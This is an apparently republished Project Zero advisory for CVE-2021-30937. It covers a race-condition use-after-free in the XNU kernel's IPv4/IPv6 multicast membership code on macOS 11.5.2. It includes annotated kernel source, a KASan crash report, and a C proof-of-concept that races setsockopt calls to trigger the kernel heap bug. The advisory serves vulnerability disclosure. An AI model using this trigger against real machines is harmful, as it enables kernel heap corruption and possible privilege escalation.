Authored by Google Security Research, Glazvunov

XNU suffers from a heap use-after-free vulnerability in inm_merge.

advisories | CVE-2021-30937

XNU: heap-use-after-free in inm_merge

VULNERABILITY DETAILS
bsd/netinet/in_mcast.c:
```
int
inp_join_group(struct inpcb *inp, struct sockopt *sopt)
{
[...]
if (is_new) {
if (imo->imo_num_memberships == imo->imo_max_memberships) {
error = imo_grow(imo, 0); // *** 1 ***
if (error) {
goto out_imo_locked;
}
}
/*
* Allocate the new slot upfront so we can deal with
* grafting the new source filter in same code path
* as for join-source on existing membership.
*/
idx = imo->imo_num_memberships; // *** 2 ***
imo->imo_membership[idx] = NULL;
imo->imo_num_memberships++;
VERIFY(imo->imo_mfilters != NULL);
imf = &imo->imo_mfilters[idx]; // *** 3 ***
VERIFY(RB_EMPTY(&imf->imf_sources));
}
[...]
if (is_new) {
/*
* Unlock socket as we may end up calling ifnet_ioctl() to join (or leave)
* the multicast group and we run the risk of a lock ordering issue
* if the ifnet thread calls into the socket layer to acquire the pcb list
* lock while the input thread delivers multicast packets
*/
IMO_ADDREF_LOCKED(imo);
IMO_UNLOCK(imo);
socket_unlock(inp->inp_socket, 0); // *** 4 ***

VERIFY(inm == NULL);
error = in_joingroup(ifp, &gsa->sin_addr, imf, &inm); // *** 5 ***

socket_lock(inp->inp_socket, 0);
IMO_REMREF(imo);
IMO_LOCK(imo);

VERIFY(inm != NULL || error != 0);
if (error) {
goto out_imo_free;
}
imo->imo_membership[idx] = inm; /* from in_joingroup() */ // *** 6 ***
}
[...]
if (error) {
imf_rollback(imf);
if (is_new) {
imf_purge(imf);
} else {
imf_reap(imf);
}
} else {
imf_commit(imf); // *** 7 ***
}
[...]

int
inp_leave_group(struct inpcb *inp, struct sockopt *sopt)
{
[...]
IMO_LOCK(imo);
idx = imo_match_group(imo, ifp, gsa); // *** 8 ***
if (idx == (size_t)-1) {
error = EADDRNOTAVAIL;
goto out_locked;
}
inm = imo->imo_membership[idx];
imf = &imo->imo_mfilters[idx];
[...]
if (is_final) {
/* Remove the gap in the membership array. */
VERIFY(inm == imo->imo_membership[idx]);
imo->imo_membership[idx] = NULL;

/*
* See inp_join_group() for why we need to unlock
*/
IMO_ADDREF_LOCKED(imo);
IMO_UNLOCK(imo); // *** 9 ***
socket_unlock(inp->inp_socket, 0);

INM_REMREF(inm);

socket_lock(inp->inp_socket, 0);
IMO_REMREF(imo);
IMO_LOCK(imo);

for (++idx; idx < imo->imo_num_memberships; ++idx) { // *** 10 ***
imo->imo_membership[idx - 1] = imo->imo_membership[idx];
imo->imo_mfilters[idx - 1] = imo->imo_mfilters[idx];
}
imo->imo_num_memberships--;
}
```

When `inp_join_group` needs to create a new membership entry, it briefly releases the socket and `ip_moptions` locks[4]. The locking pattern makes the following issues possible:

1. Before releasing the locks, the function assigns an address inside the `imo_mfilters` buffer to the local variable `imf`[3]. When the locks get dropped[4], a concurrent call to `inp_join_group` may trigger reallocation of `imo_membership` and `imo_mfilters`[1], leaving the `imf` pointer invalid. Then, the dangling pointer is accessed in `in_joingroup`[5] and, after reacquiring the locks, in `imf_commit`[7]. The latter writes to the referenced object, so it should be possible to exploit the bug to corrupt the heap.

KASan reports as follows:

```
KASan: invalid 8-byte load from 0xffffff801c07b6e0 [HEAP_FREED]
Shadow 0 1 2 3 4 5 6 7 8 9 a b c d e f
fffff7f00380f680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6d0: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
fffff7f00380f6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd

* thread #2, stop reason = breakpoint 1.1
* frame #0: 0xffffff800e2f32f0 kernel.kasan`panic
frame #1: 0xffffff800e303229 kernel.kasan`kasan_report_internal.cold.1 + 25
frame #2: 0xffffff800e2e847d kernel.kasan`kasan_report_internal + 845
frame #3: 0xffffff800e2e5fc3 kernel.kasan`kasan_crash_report + 51
frame #4: 0xffffff800e2e60e5 kernel.kasan`__asan_report_load8 + 21
frame #5: 0xffffff800d7ebaa4 kernel.kasan`inm_merge + 6836
frame #6: 0xffffff800d7ecbc0 kernel.kasan`in_joingroup + 3200
frame #7: 0xffffff800d7f07c3 kernel.kasan`inp_join_group + 6291
frame #8: 0xffffff800d7f4050 kernel.kasan`inp_setmoptions + 672
frame #9: 0xffffff800d85c6ea kernel.kasan`ip_ctloutput + 922
frame #10: 0xffffff800d904617 kernel.kasan`udp_ctloutput + 599
frame #11: 0xffffff800dd0a6cf kernel.kasan`sosetoptlock + 1567
frame #12: 0xffffff800dd38653 kernel.kasan`setsockopt + 787
frame #13: 0xffffff800df8dcd0 kernel.kasan`unix_syscall64 + 2192
frame #14: 0xffffff800d016a36 kernel.kasan`hndl_unix_scall64 + 22
```

2. Similarly, the value stored in `idx`[2] may get invalidated by a concurrent call to the `inp_leave_group` function, which removes gaps from `imo_membership` by shifting elements[10]. Therefore, `inp_join_group` may overwrite another element's membership entry[6]. The same issue can be triggered by making two `inp_leave_group` calls race because `inp_leave_group` also saves the requested entry's index[8] before unlocking[9]. However, I was unable to turn this bug into anything more serious than a null pointer dereference, so it's likely a non-security issue.

Note that the IPV6 implementation in `in6_mcast.c` is also affected.


VERSION
macOS 11.5.2 (20G95)


REPRODUCTION CASE
We need to fill up `imo_mfilters` so that one of the racing threads calls `imo_grow`.

```
#include <arpa/inet.h>
#include <pthread.h>
#include <unistd.h>

volatile int lock_a;
volatile int lock_b;

int fd;
struct sockaddr_in saddr;

struct ip_mreq filler_group;
struct ip_mreq group_a;
struct ip_mreq group_b;

void* thread_func(void* arg) {
lock_a = 1;
while (lock_b == 0) {}

setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &group_a, sizeof(group_a));

return NULL;
}

int main() {
int status;
pthread_t th;

saddr.sin_family = AF_INET;

group_a.imr_multiaddr.s_addr = inet_addr("224.0.0.1");
group_b.imr_multiaddr.s_addr = inet_addr("224.0.0.2");

for (int i = 0; i < 100000; ++i) {
fd = socket(AF_INET, SOCK_DGRAM, 0);

status = bind(fd, (struct sockaddr *) &saddr, sizeof(saddr));

for (int j = 0; j < IP_MIN_MEMBERSHIPS - 1; ++j) {
filler_group.imr_multiaddr.s_addr = htonl(ntohl(inet_addr("224.0.0.3")) + j);
status = setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &filler_group, sizeof(filler_group));
}

pthread_create(&th, NULL, thread_func, NULL);

while (lock_a == 0) {}
lock_b = 1;

status = setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &group_b, sizeof(group_b));

pthread_join(th, NULL);

close(fd);
}
}
```


CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2021-12-06.


Related CVE Numbers: CVE-2021-30937.



Found by: [email protected]